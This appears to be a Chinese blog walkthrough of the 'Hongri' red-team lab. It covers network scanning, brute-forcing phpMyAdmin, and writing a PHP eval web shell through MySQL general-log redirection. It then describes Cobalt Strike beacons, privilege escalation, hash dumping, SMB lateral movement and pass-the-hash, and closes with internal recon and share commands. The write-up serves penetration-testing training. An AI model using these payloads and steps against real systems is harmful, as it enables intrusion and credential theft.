红日靶场1

shinyorb

已于 2023-12-08 11:19:52 修改

阅读量963

点赞数 17

文章标签：笔记

于 2023-12-08 09:22:01 首次发布

本文链接：https://blog.csdn.net/laykr/article/details/134863650

版权

前期交互:略

信息收集

(我最喜欢的环节,只要工具多就可以摆烂,但又没人能说我在摆烂!):

IP地址收集netdiscover -i eth1 -r 192.168.218.0/24

(最正规的应该截完全图,但我这里不好看,就算了,同时真实环境应该加-p安静模式,以保证防止被发现大规模扫描被封掉,为了简约,简单的命令下文也不解释了)

Nmap端口扫描nmap -sV --script=vuln 192.168.218.191

扫到sql注入

扫到xss漏洞

扫到80端口和3306端口,同时nmap发现针对80端口有很多漏洞可以使用(这暂且按下)

目录扫描dirsearch -u 192.168.218.191

扫到登录界面(为什么有两个也不解释了)

指纹识别 whatweb -v 192.168.218.191

(不管有没有用,只要是黑盒,这四步信息收集我是必做的)

查看扫到的80端口,根据nmap提供的信息,这里可能存在sql注入,

我怀疑是下面的函数检测存在sql注入,

而上面的数据库连接检测,我怀疑存在暴力破解,测试之后没有限制(冻结等),完美的爆破环境,可以进行爆破,抓包爆破出为root,root (威胁建模与漏洞分析:有点串味了)

同时根据目录扫描提供的信息http://192.168.218.191/phpmyadmin/

发现后台管理,用root/root登录

后台发现admin账号,但是密码被加密了

到此,信息收集阶段暂时完成

威胁建模

目标:获得192.168.218.191主机的webshell

战术:mysql日志写入木马

方法:更改mysql日志文件路径,传入恶意木马,进行getshell

需要:mysql开启日志服务,当前’root’有权限更改路径,需要知道mysql日志文件路径

工具:中国蚁剑,火狐浏览器

漏洞分析:

检查是否有开启日志文件记录SHOW GLOBAL VARIABLES LIKE '%general%'

发现没有,尝试当前’root’账号有没有开启日志记录权限

SET GLOBAL general_log = ON

执行开启日志服务功能命令,再次查询

成功修改,并且也知道日志文件路径,可以进行mysql日志提权

渗透测试:

根据信息收集,当前为php搭建的网页,所以木马采用php编写

先进行修改mysql日志文件路径,改成读取php文件(为什么是www?,因为这是phpstudy默认的路径,在登录后台就已经得知了是phpadmin,这也是phpstudy默认的后台界面)

SET GLOBAL general_log_file = 'C:/phpstudy/www/shell.php'

然后插入木马进入日志文件

select '<?php eval ($_POST[shinyorb]);?>'

然后查看191.168.218.191/shell.php

看到成功写入

蚁剑连接成功getshell

这次我用的是cs制作木马进行内网渗透,可以看到上面多了一个红色的可执行文件,那就是我传上去的木马,接下来我会介绍下木马制作

首先进行信息收集,现在暂时先用蚁剑的shell环境

ipconfig

可以看到有内网IP,可以进行更深一步的内网渗透

systeminfo

知道版本为win7的64位,进入cs4.7

选择payload针对windows的,勾上64位

(已经连上了,是因为我现在是复盘,正常操作现在还在制作木马)

cs会自动写exe文件,用蚁剑的上传,传入靶机

windows用dir查看当前目录,发现就在木马文件路径,直接运行

cs上显示靶机信息,成功,接下来可以用各种cs插件进行内网渗透了

第二种方法:

进入蚁剑后,看到有yxcms

尝试访问

发现信息泄漏,尝试登录后台

在留言板存在xss漏洞,

在网站模板存在命令执行漏洞,可以直接上传php代码,路径也显示在url...

后渗透测试:

信息收集贯穿整个PTES流程

发现当前是admin用户权限,还发现是域用户

执行shell systeminfo

看到没有修复永恒之蓝(暂且按下)

尝试使用cs插件提权

发现成功提权,cs多了个system权限

转换到这个system权限,继续用插件进行信息收集

发现域环境与域管理员

有域环境的话,可以尝试打域管,

执行命令shell wmic useraccount get /all //查看当前域环境内所有用户,当然也可以用插件

net view

发现还有两个内网IP,发现域控OWA

尝试抓取明文密码,用插件

(还是)

也可以用hashdump,这是cs自带的

新建一个SMB监听(这是因为发现有445端口开放)

进行横向穿透

横向穿透SMB的使用

因为已知admin用户账号,那肯定选择最高权限的用户,session则是与受害机建立连接的内网攻击机

,建立监听连接用的是SMB,我这里设置name为blue的就是SMB

到此,内网渗透结束,三台主机shell已经被拿下

内网getshell就在一瞬间,在明确了445端口开放后,同时没有打补丁,直接用工具使用SMB建立连接就getshell了,信息收集是很关键的,只有信息收集好了,才能准确又快速的完成渗透测试

渗透总结：

利用SMB Beacon的说明：

介绍：SMB Beacon 使用命名管道通过一个父 Beacon 进行通信。这种对等通信对同一台主机上的 Beacon 和跨网络的 Beacon 都有效。Windows 将命名管道通信封装在 SMB 协议中。因此得名 SMB Beacon。

因为链接的Beacons使用Windows命名管道进行通信，此流量封装在SMB协议中，所以SMB Beacon相对隐蔽，绕防火墙时可能发挥奇效(系统防火墙默认是允许445的端口与外界通信的，其他端口可能会弹窗提醒，会导致远程命令行反弹shell失败)。SMB Beacon监听器对“提升权限”和“横向渗透”中很有用。

简而言之：外网中的A主机与B主机相通且已控制B，B主机可以与内网中的C主机（无法连接公网）相通，但是A主机与C主机不相通，此时就需要在B主机上利用SMB beacon使A和C相通，进而使A主机控制C主机。

使用前提：B能访问到C的SMB端口，拥有SMB的管理员账号密码(一般在B上抓密码去碰撞)

1.具有SMB Beacon的主机必须接受端口445上的连接。

2.只能链接由同一Cobalt Strike实例管理的Beacon。

具体步骤：

1、获取C的管理员账号密码

2、创建SMB Listener

3、使用net use进行利用、验证及创建SMB Beacon

Hash传递攻击介绍：

哈希传递攻击是基于NTLM认证的一种攻击方式。哈希传递攻击的利用前提是我们获得了某个用户的密码哈希值，但是解不开明文。这时我们可以利用NTLM认证的一种缺陷，利用用户的密码哈希值来进行NTLM认证。在域环境中，大量计算机在安

Hash传递攻击详解：

哈希传递（Pass The Hash）攻击简称 PTH，该方法通过找到与账户相关的密码散列值（NTLM Hash）来进行攻击。由于在 Windows 系统 NTLM 认证的 TYPE 3 消息计算 Response 的时候，客户端是使用用户的 NTLM Hash 进行计算的，而不是用户密码进行计算的。因此在模拟用户登录或对访问资源的用户进行身份认证的时候，是不需要用户明文密码的，只需要用户 Hash。攻击者可以利用 NTLM HASH 直接远程登录目标主机或反弹 Shell。

在域环境中，用户登录计算机时一般使用域账号，大量计算机在安装时会使用相同的本地管理员账号和密码，因此，如果计算机的本地管理员账号和密码也相同，攻击者就能使用哈希传递攻击的方法来登录内网中的其他主机。使用该方法，攻击者不需要花费时间来对Hash进行爆破，在内网渗透里非常经典。常常适用于域环境或工作组环境。

常用内网信息收集命令：(在用cs时,一般要在前面加上shell)

ipconfig /all 查看本机ip，所在域

route print 打印路由信息

net view 查看局域网内其他主机名

arp -a 查看arp缓存

whoami

net start 查看开启了哪些服务

net share 查看开启了哪些共享

net share ipc$ 开启ipc共享

net share c$ 开启c盘共享

net use \\192.168.xx.xx\ipc$ "" /user:"" 与192.168.xx.xx建立空连接

net use \\192.168.xx.xx\c$ "密码" /user:"用户名" 建立c盘共享